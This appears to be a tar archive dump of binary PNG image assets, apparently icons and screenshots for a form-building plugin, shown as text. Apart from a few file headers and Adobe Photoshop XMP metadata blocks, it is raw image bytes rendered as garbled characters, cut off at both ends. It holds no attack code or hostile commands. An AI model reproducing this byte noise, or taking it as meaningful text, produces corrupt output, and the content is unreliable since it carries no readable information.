�'	����X/Es*<O6.��9���c��:������Y�-�G���}��M�����r���H�ϯՍ�%I4V��	Y
իk����fq�Y|k8�3���R���v�����8�3�j�
���:]���o�5)�Y�f^�>�AE����#E��aܤ)� �)Ekz׶�W������,��vN�{�g��K4�'n�߱�6�t�-՟�a�m}RaJ�d��3��H�~w� �O8���P)U7���k��=�x�Z�p�f>i�n.c�]��"�7S��E��K�VZ�E�S�]�8j�v��&F�Hѯ� �fF�^�T��X�Hx����?�
�0C����y�"�����c�dR�D��
Zv6��&��8���~HQ�Aq�o�9���׊V��qQ;�XA��If��N�c��Uk��.�L�S�c���ȸ�s��=�#լ�^u�DN�V�7���O�Z��1N޲87�'.�@Q�
���aǟ�3��1_���(P{������1�U�V����=�b��r�(��.���S\z|M�g�E}al_��������B~�B�:CT�O�:�tk������C�k��ז�Ɩ�!���W�V�y�Ërl?�k�-HQ�#K��J�+,�TS�{V0vz�/�hr��Q ��t3N�+�Qr��1�������;p�"Eai��?rt�ٮ��W�.��(�h��{O���h�O����.yخ�v�E��#���G�����KM�.89�z�E*y)=-$Ti�������n3_�т�.賥NWްuU��ܬ�K�������h����|�i��i�+���=�
Fڍ91K����[\Ҵ�61atr�\z�pA��4y��)G��Bj^.��|����R�c��Rd�Ң�h��ٶt��X4ͬ�:n۪q
����]����nj0��3)my"B����"9���E�9KI�ly^��ig�YU����8J�-Mn��ЂGQv��j����l�w+9�O2��)Y?�������?q�)
��������Ҝ6��G���EA?Z*�n����Q�h{Qq���ca�����M�b���c>� JY�9���JJ���x�@Q�)xQt�=�u���v��6�D�P(
���,O��D-�m����~�Tv��0��*B��RA���6�D-#]\(
��g�.n{�Dz9y^�m�D�BQ0�,�d��BQ0p�'�R�.�t�,����Z*���E�����\h��`@[j�i]\D(��RJ�-PTKy
E�������P0K�PPK�Ņ�`��ʡѡ(l�"B�(p�^�(
����d)���BQ@Q�(�EPE������6��+�����NW_���q�h�ٰ7ԭ�%H*������(�EP(
��(
@Q`P�e�}�屿@�EPE��(
@Q��(�EP(
��(
@Q�(��(PE��(
��@Q��(�EPE��(
�_�Y�`|y�IEND�B`�assets/save-progress.png000060400000007413152434416630011365 0ustar00�PNG


IHDR6��_tEXtSoftwareAdobe ImageReadyq�e<!iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:F0EB82B8306811E5A5A48B7AA9377A04" xmpMM:DocumentID="xmp.did:F0EB82B9306811E5A5A48B7AA9377A04"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F0EB82B6306811E5A5A48B7AA9377A04" stRef:documentID="xmp.did:F0EB82B7306811E5A5A48B7AA9377A04"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>A#"e�IDATx���{l��qߝ�<Hȃ��Jؠ��F������6`�c��iSW!MC-+�Ĵ��?'M�-�bi�i�Ҥit��f�%�u	y'NLȻy'��y�G�č��m������q��|�����Y�^��0*�M�(H� Q�D�(@�H�$
�D@�H Q$
�(@�� Q�D�(H� Q�D�(@�H�$
�D@�HXȬl�PJ���F��t�k�e;0�$
�D@�H Q$
�(@���^Fp�[��u]35�D��ST�s��D Q$
�(@�� Q�D�(H�$
�D�(@�H�$
�Ds�����j�Vv������s�v?���������ɯ���n�Ζ���,���K�$�������;��MS?�����ՙ���o�t9ǜN���.WU�]���jَ-_|v�7�$��������%xgHR�]��A+�Ō ��Q4`���k��;�_:�� QLS^^�J�B���^�7�+.���,��Dž�9���k�ټ�
�������3/�;�D1�2��9Z��W���]]Ǧ�l]������/�9~P]7r���C��5��ݘ*)}S���j�R�7�b�}������ڭ�s~mEc�c��5$
�ݎ����מO��%x6��h���Z�����lj=u�4;�D�K��<�/�]�b��U��j���n�ͫ��G$������5:+
}LHQd�ߪ���؉��&]�ݾO�2�:'��w�a|���'JJ�S$�H�9]a~�\���d}&#���4��U���$��U�«ty��nJ_��d��$&����[��)�{�jn=Q��#��yQC
��������,M�%�zz��uk\�,B”�ݞ�s����4��J��;�Q���g����@��43� 3��f�&L�˪k�aݙ뵍G���N!QL�9�ޕ��EU��O�������١�diNnZN��j����+���\�q��f���7�/Lt1�ݡ]R��Dm
9�5�,�)�6�w�d9�s��v�䩗�Ȯ!QL3Ν����'N�!�2хQU�7�9�;��¸�e�ѓ���Da`�u��o�g;�(���G7����H�aum�Ǖl�Aմ:DQl��bS�(���P𾀉JIF��='[��4ԲAH��D�ID�X��P�6!Q�F�����jEI�hnd��(C���.�oW��
C�0�(:� ������;�2$
����TڞN�qU��_��_����e�4�IR��[mn����k:���y���9����c�CIKRى$jZ��?�Ȇ/��o���/O���
.T�sz��u|dؖ�"��Θ�і��اf�gW����aT��*Y����~��^v%�����q����{��S���y�#y>��ao��	�\r��E������Ǟ����ء�E�f��i���='%��[xV���顮��x3�)�ZK Ήt���ޑ����tv+��_���+g�5�[U�y�"|�n!?'�����q�.'FN�ǂ��n�`��~�&/Ic2�5���o�7�����-���<r�l�g�S��5�-F%ir��7alx�=H�&�(J�oS�ÿ͠eg�eF��_����v���I��|w_q�r���-x'��E0�z��9������m%�7�R֢f��l�/~�rl�{`�a�4rN}�����i��؛$jZ��K
q?�y�)L|�J��"&��էﺊ��d�=N4�8}����"˒�_<Žm4�8��*��?�a���Thd}����$FQ�ͅw/6������*�¼�gv}51�#7�����������?�sI�[�TY}�������Ωs���K��DM�fUu�o�VuMT��a����<���ٓ���{�ĴO���✼�2�B��ȇ|���v��#Zw$;+3/;;�>#<��� QCNiĐ����Kc��"=+�@���)'�. ��*�$]k����Zta�s�[�~'Z�Q�sڲ3�g@���+*�Wފ��ilz��z���s,�zX�8����߿�i݃E�V)�����}����B��o��$QRt��KS��*�b؟Bu�3��,;�蚀͚`��B
:�˲�DM#Y�	~��4��$jN+
�L�S-'N5��6n0�O�䣛Yv��9�Z��8?wA�Y���_��I�攐��o��#��>�$Q3[�~��w<�@��w�]�9f�1���܉�۾���K�ZX�|��}��O'��_jF��<������6:ڍ�?S��w�΍��'�.�9ykTuea~���fM����o`p�{�������c�JY+
7o�<q��b��W��ձ�"��}��ޑ~η��d�A��9��{.��X����s�7����Ǣ�'�lEᑶ,{��G�]oz�89I�R��
}��}�3۩}'�"F�fd��+NW��O֢�CJZ�dK�e�yOO�����U��Ѐ�(�lA����T��'��WRJj�g�3��>E�C�$%ؒd���$j�]b�Y�nխ'HԨ{%1Qv:UU�	�5�X*��%��>�3`E��*.���7�ْ(�HJHPŭ�Ag�#N�a�"��z�#�=g��I��_����v��}6�B��2�UG��i�>E�JEQ���M3vH����g�B胺<��(��!q�(�U��/q�(�p
֢H�$
�D@�H Q$
�(@��B�_��t�gD����a>Z������l���Z�F�1���D� Q�D�(@�H�$
�D�(@�"�_�D,%�sE@�H Q$
�(@�� Q$
�(H� Q�D�(@�H�$
�D@�H Q$
�(@�� Q$
�(H@|�_�<ى��A��IEND�B`�assets/post-generation-update.png000060400000012000152434416630013147 0ustar00�PNG


IHDR6��_tEXtSoftwareAdobe ImageReadyq�e<!iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:AABFD630306811E5BCB5A52A57D13507" xmpMM:DocumentID="xmp.did:AABFD631306811E5BCB5A52A57D13507"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:AABFD62E306811E5BCB5A52A57D13507" stRef:documentID="xmp.did:AABFD62F306811E5BCB5A52A57D13507"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>[�	�uIDATx���tT���+�w̃��BP@��<��<
�H-��uO��{v{V�t����svמ���h����R�EhݵV����A+

���	�@2y����o�N�If&03L�g��0̌���w�ܑ���d+�E�(H� Q�D�(@�H�$
�D@�H Q$
�(@�� Q�D�(H� Q�D�(@�H�$
�D@�H Q$
�(@��H?#�` /��BȌ�[[Ot�E@�� Q$
�(H� Q�Dd��#�^��+�k��(�q�����$
�D@�H Q$
�(@�� Q�D�(�K��E����k:}�����[Z:�{�@�RI�TJ��$�O0�ה$��<��bɼ�U�G�L&�*�"����S�6�j���[�oj޽�=0u�TI���w����c-�oL�X5i,��Dap:���>:rL���}�·
G��d��wk���s��n���rZl�� Ѻ��7�rK��)��3�ڿ8~�0?/��8�Jk�O��Ц�KL-��V��v8��ْcc5���v���gO�9��w��r:;�Z��jn�`��*k�5��E[��=�_?Ki�dp�,�,VV�����?�l�=}w�4Qf��sⳭ�h�J?9s��b/�j����0�����9>��XJ�#Igg�O7oij=?�ƍ���w���
*���C�^}-�B)��7ZiN~a�J���[�rSW���_�r���߾q�M���8Ǔ�>w���A�#Z*)ډd�fs�[ћU*~�J�K\>�����<귧��RQ��+�$��ɮo���y�G�<'{<�v�s��5����՗>��-}��O6�gd�`�a}��=�G����?��ѺNw��|]�_��t�)�������������F?X]�_��l<��r�X�$z�o>��g[;���]��v�,Kq�_���#���!*=�f?��6,���E�yE%sG}�2�V�͊�<���cL�[n��{�v�^�D����M���lK��-f�=˗^��kZ0�X|�O�gW�#�u��sJC�|:;;E����sF�˴�UW�U �����ms*
���kh�4M�t�$z�q:�?ݼ����ydyͲ%Ko�{�݁&̒(M���(gݪ>��TD�ewOO@UE��پZ�g�����;��H�~-� =�NI�j�t>����SQ���Y}�bEV�q�Rxk4f4
�=��j�g�m��Uj+(�C�'��I�i��xm�5ڼ]��&�ɚ%ѫd~�a�s���M���.^���O|J��;���2�~6�Υ�,]���q9~N~��y,�^h6��%IR)�.����ێ6�����%��j�.!hHS�э���BC/���$���RBc��}n���Z��!W��-����=��S��E�@�?��t��+����5K����3r�?G�θ|�H{�O�O=WQ�9�f��z]��ih�qG���5�B8ѳ?E���O��E|�b�sݪ�+���È���:�g���k�;b��.죒$��-����9cw���ی��&��5�(:��t<���ׯ�>�Y~ǚew�j����殤(-�u_�l9���tݽx���Q3��=�zajms���<�1�s�ͣn�o-����NU��l��%cmc�@�U%}����j�$3��p��6�2��+��r�+�e쑴��Ͼ����FM�lI�vt���\{mI���ӂ�n�g��{S�rM�֞�.1�u��Lk3�J7<e��v嚔�Օ��g�D�A�2��~�Glm:?�\��׬��yc�#
'�}
]ݯ��Sb5�9ڶ���؁����yr����}t��?ޗ���r�J��t-��c�s�vM3�"U��6=�%�VLn�Z�XI�n���6$<��{M�x��Ӻ�=gBOu��7�嘭��
��Q?p�׊��:vfyA��T]�����]���Y���_�ff�(�����9|����&�����]�L|���\bP�ʎӭ��>a]u�Eџ�1��}z��f�gӧ�v��(K�+��
�������]ݱ;u
�A���$��j�z{ߑc�Z$�\���zSp<�1�!Z�e��6<u�t��+7-�>��P��|N��c1��>o8���O~v�^�'
�g��J��f������K�t���{�"�H8�L�&�7�c}������=�Q]��V��[&v���n�'�];���JE�����6���ŗ��$�^���hʌ�D�Ż��ux��!�QB>ߥ%7ԭVq/uǎ_�jŅ������v�ogC���+�6{R���t���>��S�[��D����ܵw�������6�tg!S��׾q�p�ů:�C��Ů����+���m7�/m�z�j�C����@J�Y��t��O��5��Esg'��/����]�.S�~s{U~�?�<����E'_}�hVhk;���S�i6�V.�?aܘd�J@�D��|�?��j�,:�p���)�{/�Y�\rS2�%9��O͚D�?�߸ѕ9V�PFŴpl娙ӦL�4QN�0U���s�?�M>�.�}��K�xv˕Z&�I��$n:�w_[[=a|z�3}�zgO|�������L��H�$:\��m��x��Ͽu��w�}4-���I�#�?xq�������ξ�fe^n���J�j�Oe��Wk�|���)�]��<]���>CWN�)$�$Q��?���n��)�|h�}fs�������D�{�Ƚ�,_|m�w��y�-_�����}�(2A��E��}�<��<�w���]�9>}�(�?�����7�/�u���_g�X�D1؏jZo^�o���w�/�ۿ��.�$Q\1���x�m�g���m�f�_}��ʲ��Of�h�n�����������w�2E���{y8jz�O�$J�!^���~������
��B�g�D��guq�D�;<�U�I4��f8	'��0�M
��舜�~��p�>��p�nM	����krm9�.E
4Ž�1Y��7g�y,X�E��D;���RUEyIq�!:��Q��W��y��~[�~��b�5mʔI�K�#v���}���^�fͼ{��6]di�~?oH�ȚQT�;a��bfQ�(@���@���QFQ�(тD�=8�}���
��/���iko�~;���pgO˕D��@��6�z�e�t5ވ�D�*fS��j�{3�-��J����f���b61I�f������%���E��b4V�x�?}=���Gۻ�U@Q�ާF#g̋�=����i�Ŗ�`h7Q�d4�<����,[EjXrl�'O�*/� ����?K�u�s�}��#�%�׉��#$J�H%k^���a����>�qF��٧��I�^��"%Q����<���+�gd,MЧ����o
�H�!�$�t�xm�7Yq�$G+�Ϙ�S�,s �"��J��4v+�"}JRl���D��Jsl"6�Ñ|�^�5Hib��Ҽ.��O���q}R)�"�L�!T�3����C��'�>F��T�f����v�(a��]�?�*Ht,wS���3���~�&��X��"�DGJ��N��|�Pt�R��h˹s��^u���R����#�A	��ԯ�.��^�Y+>X�$�tV*I����@�Qa}�(2_��(�+�O��1�*����VvM	�1M8�,;V��(F��}
yy�o��m>�j�4a<+�D��J�z��)��˵�_����02�f�!�V��{|����5�D��'ɲb0j�@���h�c+G��?|����N�����7��Gk1�KK��̛[UQ��$:�*�{���`�aTY�ڕ��,d�(2Qi����	��C�d[��4��o�$Qde��,�'H4�+5\�]�$QdG��I�N3^�$Qd�pJ�$�lNx�W1���)E�(H�$
�D�(@�H Q$
�D@�� Q$
�(����E���J�z�!`q]��.'�D���I]��c�Y\`��(@�� Q�D�(H� Q`X�0��f�}��� Q$
�(H� Q�D�(H�$
�D�(@�H Q$
�D@�� Q$
�(H� Q�j���B��$.IEND�B`�assets/form-maker.png000060400000021172152434416630010623 0ustar00�PNG


IHDR6��_tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:CB3F4ED9305111E5BF0797821BF5F5BA" xmpMM:DocumentID="xmp.did:CB3F4EDA305111E5BF0797821BF5F5BA"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CB3F4ED7305111E5BF0797821BF5F5BA" stRef:documentID="xmp.did:CB3F4ED8305111E5BF0797821BF5F5BA"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�U<S�IDATx��ɓ�u�3��^fгb�� %J��P�Z))dY��C_�8��B��ᓭ�O�u�a;l*l��(R&E��(pI�X�tז闙�YY�=�A�=�	tWW/֯��/_���?�� �W	�
 �BD!�BD!�D!�D!�Q�Q�Q��(Q��(Q��(A@��(A@��(A@�  
A@�  
A�  
A�  
A� �B� �B� �BD!�BD!�BD!�D!����+�M��i������]���\��(A@��(A@�  
A@�  
A@�  
A�  
A�}��9P����}���D!辫�,��k@�A@�  
A@�  
A�  
A�  
A� �B� �B� �BD!�BD!�D!�D!�Q:pB��{�t�yr���2������)����8�����cǏ�y>��2��@���X��j�֖ԕW�y��ș�A)=Ѓ�(��A�eY�k]�W=���{�<���1�����=�U���|7(�;й���h}�L\�q#�����+o�~�����\�I��g�^��E�	�f^ۓ�]��� w�vh�S�Y�R�~(��b
�������\5�����R���/%K賌om\���کӠ�P�IU�ͯ��}m�%	��U͜u�N��ZeŘd��j0�!��Yy{l�4�
��wy
x}\���,Q�����з͋�g��S��(��O����ٻع���~k��C��T
�?�(Jc�,�U�8e��%b-���F�#*�7ux\�S[���;_�(���_A�3�n`v���5�t�|/��Rc)KVU�*XYp�[jX�≨?���o޺�����@)=�q/��o
�_�'!%T�rG����s���f#SQ;��Y�obU;�q˪2�֐�-[����Oœ+�s�Gē���Y9v�~���
�g�[�����\�dSE��煉f=*>|
F�u��B���{}RY���G��X��!n\�0��A(c��f~x�o�&�nF�€���~f��7/_RJ�?6=H\�i�?�Xl������q�����i>��.�f���2��(b�y�BM�͜
'������_�4�?�K�-~�;�936c`N���J��s:���E�\�0åՌ@�i*s_�T=�%/�x�2(E�{ ��v�����-V���|YG�t�'	����SZ�����y��<Vi�Dt�]%�������V�N�D����p1��/?_��8ݍ.]���	����^�;�ձ������g�Z�C�jju]���d��39!G
�Mxn�����F>l��۷�^�F�D���0�J�E|{S�%�+��O��4�z�<w>?���W�Ҋ\]O^~^>Fa�:4"�"�'>[�{LgY�UU;��^|�u��!�	���k���^?}�ɗ��Ҟh,�O�s�;��&��Ϩő�����q���RŹNJ3�cu�Ib�6�m���kG%Jo^.���t��z;R�3��z�x���gӗ_�=�C5\�|�'_����b{����dz'��X
'_�fy�!���>���7������?�����řGYeY���W�?����:Ž�~�tu�\u�L��O��Y��������o��%[&�y�ף\ޔWpEL7OӌK�ʒ�/\�`E�~>�ξ��?�|�+�@������l2&PU�͛�ׯ֎����Nu�)"9X`���K�J�?�E��������Q�Q�\�%�LO�yNВE���{M>�U���V��+��7(��O�:|\��<�6�P��$������q9�G�Ԫ,�o^_X^���b�!�:[�3�E��)�(T��Y��l�n�^�!�\iMb֔�Bs�ͼ���U%)�'E6������z��'��7�=R�8s��ç�7��?��j��/���+������̰��
&c��Q���WDn8j�I�8j�e�[��(�T�.	��K�5���+"0�S��|?,��^��e�p���T�ӈ"��O��u��bY�fMrH���D�X[�r��\x9�y���ϳ'>C����S�X������c�GO�����4F��9���D��D�1U���j���On���L�6o
�@)��(�	�)Q캴�G�������ɓ_�ߺP9^<�1�d��(��YV�<Ê�������>���E�׸�9� �䓚y=�1ʞ���_K~�D�K�.�7�/~=~����,�E��&�Q��T+�:����Rɚ�C�3�wSA��C^Szaˏ�<�lm��R :��Jw��])
W�D�ш�@�g��zy��'(�yDCX�r���{y&�V�+�.V���:��RIR�:�m�j̬8�0/s�fO~ٚv�ҳr=��?N�Z�8]<tV?���Q����L��¾��$��(�c��:�D�v�:jड़�y���.�R :��:��`�Т�a6�Q�D]��A�z����&�g5�^e*��50�j֛�V)�j3sq��JK+����F�ځsV�H���ˉ�8�(YVJ�+R��[�&"G�W�Z�糹�y�ʨ*Ȼw���9�x�5�*��)�x[���8bqʒK�z�4Jjhyd�jES�\��۶��g��OS����GŌ[c$| tU�Z?�5Q[y��P*YUUT3Z/#�*�[����!�ʹ'��x�R6NP
D��Fm^G)=�[���f���Σ��Od�븩��M�;\��Aʝ�5%ܗ�7+Q�j�n���M��E���|�<��YYJ��$���_��׀M�鱨��!h�r�2O,w�HY�I��R :gjW��]�����Ѱ��(O"Qx��?����N[�v��.W�u��`U[P��Y�T��!�$W)}?D|ԋ[��y�WZu2����a:�.6��jA����8MA)���R��Y��UY�U��.��R��D
	���%������0��RY�2�X��^]=�g5+
M�L�T�eu��=
bC�Q	s�,z#�R'��I�f1
��]S�G�I�մ��!h����%�4��P
D�"�
TUj�-ܵ^Hyu�82L�IDlM�>�K%K=1��\��t�4 E����E*�=��^��d��ff2c�F�P�*6�wG���H�[y)Lr�>C,�� �)dU�1�.A梁P���A�����HD)}Q��
����@�B�J:�
H.��B9~|�"S�.��W�7���R,zy'�>�|��~ALJu��?w�����i�$)�5�J�c1���;��upkV��P�W�i3
��n���V��%� :O2�=#�����!������w*�@��"��O���m�;��K}��ԯA
�s��VnJ&+�ɍ�j\T21��D�6�ͺ-��fh�9o��4|�s�md	J��ļ&[+x�C"8E݈���v�H'G�Ǘ�R�+��f�f��d��0>J��I5#��b�`��*�yUMJVT*/K:X'�8�׻6ɡ�h!@�۳�����I���F�����ɤ�s���Df
D��rB�Ʈ��XV͸�G�Y��lWm;l�0�E���L��$�b?�塅v��Qhx���.l���\��`Q�F~������x#�uj
9W�I��`(F��E��F�t��^�:o�*h��q^��dfŋ�_�orS&���~���.A�w�H�4�ǹF�`��Y�+X���5�iȧ,�M�j>y�k%j���(��ݑR�fH76�OduA�t�k[q��X)��%R��J�zu���/y͆���`3+�+���\,�]ṙ�0Ht�Un-4��fu��dj�P��Z��
�]�kUV���fm#�T�F�U=O��6F��n�_3��w��N! :�P��B�@W�+y}���(�ܢa+��yN#��K�ƹ�G�5J7�b\�n�X,�"5�a�:;@)vm��v�F�T��	f㈠P�E��9�1bq��\��>vqD�i��~,�{7'��t�;1s�PP��� }o��†J��uz��>��w��۾q^U72�i��)5�(j�\�O�hVd�A��z)����!n+�
&B���Vb	
D��Lu?!]�cɪ�zo{�Vz�{9�z+$��(E#�CiD��UO�����Tόz@e�y�Je�T1�nA�:y&_?�"iI>_��$��Y�(�Xh8�2�va��]������ӕ�踬�nn���<vy+�G�ᐳNI|���)z[$�V
C;\�4n}l�����e�3K4M ��@��$�8�{��d�FJ��Hr�u̻�C���u�ɻ��]��r��cY���aE�Ґ�ޜ�,�T�_���P :�9#ƹ�[E�l�›9��-��Y��|��jm��~�n�֚i�ts��K����n	��u�Z�ŭ��gq�� � :?9#3�TM��@�S��R��jWm�T��`�K���3�5�@�,C��Bu	/�ݨ��_��h*ą�uҺH��%���v��޾6���W�%�m��X�e���;��yTw�,󰸂\T*Z-�:�)2�^†�v�-�
��)���L]��T�iw�\����Js�M��:�J�P݌��٥�
�J�N�v
q�g���ΙR!�(\��k8"�1�T-����ۈ�Cr�I�N���iUwٮ�W
�܆-n�ˮY���9R��|#r�6�
��Q�Y�1�p��/�f䩦��mD�Y�`�szlڌl��|*�dۣ莞�%��:�5����B\�)��7���OEcхD���2�N�lV��,�e{G�Ss2�sV�]�CY�gS�~8j���8e��gq��' ��;ّAbwD�G���<lR[�ɩ�x�%�A����Ww�<�)���´�
Ƣʖ��O!�G�<,�Λ��qQ^��PiK�.�W]�'�i�O���"Z��6��s��s��q�z}�2�i#�K�����S!.
t�������u*�u�Y)��2҉]~+�k�t_�Jv�ɃF����j:P�{��y��X������SK���pĂ�fc��+�vʧ����S�N1ux���"6�¸-x%#՝��>F̖�3N�(K<k���VT8�Tn�F�m��Y���6��0��X��H9}�
�mkf�Y����q9,�HI�Q��DT�������ش�S�8&�4M6�R�w��
L�T0�L\z�����2/�����m��[�X����觔�,
���y %"��`Q6K&�ĕ�+K�L�ə�(��@tJ3`w׶�+�//�� gq/��Rʍq���Z�^��[��'5I ���D�k�ML��,u���J�t�zی���իO�����v�3K��x��Qiw���A`CKU�c�-�r���4��L�{g�"��Au�l��ֆ���ۉ�o>~���E�5L�mEuɿ����B\�]�<*o��`��]SS�h�Ѣ4ѣ��:�]�$ӏ�}ƺ'�V��
���h�
���q�g�}��?�H�j%؃��
��T8��om�}�һo^Z[Z�ۉJ�臎hYV�m�%d��V_��6o��=��j���;����J�:1����w.�z<ܕ��l�VS���%I�Yݙ��D���E�[VC^
���mC��~G���I���4֮/pKO���^�Z,�;X�/Z	�,����	��s�������օ��o;т�λ��d-��ųy^(߰��䲫z��T8�̘�֜�*,%Q�ԋ+��S=꛲<Ԓ�[��_�22�7�O��kkkǎs%~��hA�D�]U���� U���eE���U��V�V��v��+U=CR��R��I0��.ٚ0�lv��������PJ�e�d2��9%IbZ�C�n���~_�E�~�&Z��P�	D��rt�^�
�B���=�u�4aʩ�zJ��R�4.�VF�dN�^z3ޢ �@�%��Ai���.�Y��ŋG�ѧV�/^~g����Y"�����d�L�I��ӆ�qh��?�Z�ӿ�_)�V��٠��r��ן�?�g���*�,�^����;cΐ:6��匃�O���7j���{���<���|k�P�����;a�@t.E�vz�tn�q7�9����
T떡v�|��w;H?)6��~�{X(�D@tNue'������.v���-Y����
����n��)�m��e��7��wk��̙�+�mo���BrU��-�1
�Y%�{\L�ƽ���������S���ёc���?��3?���mM�J	��ۉ��7�n�����ڎ��qbn�Ԫ>"D=�c�����6*z?'���z"ƒj�OVR�Hh)��6u����f���_�b�7��.�뤙����Ϟ8��ŕս�Y��@t~eSD�ό�7�KK.`�S��6�WsKG�8	�SDu3L�y&7��
���Ɖ�z���͡ޙW�Nw��2՟�<�[P-H�����[�sie�4;�q��
UY�v,�8��'��᣽��{���y�Z�X�Eo-��gr��`w�m��C\ϧ0��q���м�R��Žf��r�gЧD><nu�
o�����#a��P�uq9�}�r�꭫W��K|�S/��YP>��R턓h������Q�߆�L���<�V�jX��� z�����/,=w�z܍Oo�>;��~J
X�f���=���d��ĻoC��,�ѹ�t�g���L>���1[ʂ�yoR�H6�Zn��]�{g-���Rz[�O�;�B������sN,p����!.�D@�t�`��
�I����|j���,tܿ1�Bo����>S��K+w�%2�3�Dܭh�-K�\孷��|a�@��#g���B�a����!��%���w�
��w�
D�҅��S����5v�'ZBe3�N�<�D�>��Ҵ�_;uZI�skc�B�D��&Z�\�A�4���h��هVV>�,��D��&Z,�>���<�tt��#����q��h�,�P{
&Z�(t٣3�� :s���Uם�?��NY"�E��q)Qz��9��K�އ��u���hv{�B �@R��R�h�Ƶ�d�<u���qÉ�0K��J�:Cw�n^�mڱ�Y���M�����m\��`>�Pd���o/������ugJ��%��.�m�YJGk�ٽ(�}-w��,.��y��	ݟv���:5���9sZL��E�{�D���uo&ZP����KW���{;��`��u�3}}O���^�v���h9|�>O��tBX(�jJ�^�"���s����帘hA���7�+�N���[��{2=�2�%�c�.��Q�n(]>z��L�6��.4����C��Y"N���	�>JEM��!6��5����.��D�������w�s�X(\���[J����	,�BwJi�Z]�/,���-t�;�T��$Y\Y�{E6��Q����K
�����~&Zfg���"����tay9o;�2��9RX(��
�Q�,,-��&Z�(4��GKi���@�WJ���x�P2��@�'/�/.&i��@�KJu������h��S:�iY�@(]�U?�����U�|}t�臔��3E�9&�a�Q��;�F�x�m �;D����D�X���}����&c�� �D!�Q�Q�Q��(Q��(A@��PF�� .
A@�  
A�  
A�  
A� �B� �BD!�BD!�BD!�D!�D!�Q�Q�Q��(Q��(Q��(A@�4���n���oIEND�B`�assets/add-ons-icon.png000060400000002245152434416630011036 0ustar00�PNG


IHDRVΎWtEXtSoftwareAdobe ImageReadyq�e<!iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:7A713EF2264B11E58A2FB58273BB0238" xmpMM:DocumentID="xmp.did:7A713EF3264B11E58A2FB58273BB0238"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7A713EF0264B11E58A2FB58273BB0238" stRef:documentID="xmp.did:7A713EF1264B11E58A2FB58273BB0238"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Pfg5IDATxڬ�JQ��;�&$�
�AҮh��R|���q�*�ޠv*T�JD�R����Ш��d�΄��x���u�� �4ƔLr��MG�<��aSA��'gҫ�w�ERS֠��NPXe|��Dդ�|���{Z�#.p��#{"׺>DC}�'v�wd\;���Q�:��X��hD���y5�Yُ4q���3񵾡��᎚��:ӧ���o��ox�{�q5����$��j��F�Z�9g
I���;����GPmԲ�.�x��q֯�-<�2��GIEND�B`�assets/pdf-integration.png000060400000011215152434416630011652 0ustar00�PNG


IHDR6��_tEXtSoftwareAdobe ImageReadyq�e<!iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:FB6D2DBA306811E59DB7F03228FCD434" xmpMM:DocumentID="xmp.did:FB6D2DBB306811E59DB7F03228FCD434"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FB6D2DB8306811E59DB7F03228FCD434" stRef:documentID="xmp.did:FB6D2DB9306811E59DB7F03228FCD434"/> </rdf:Description> 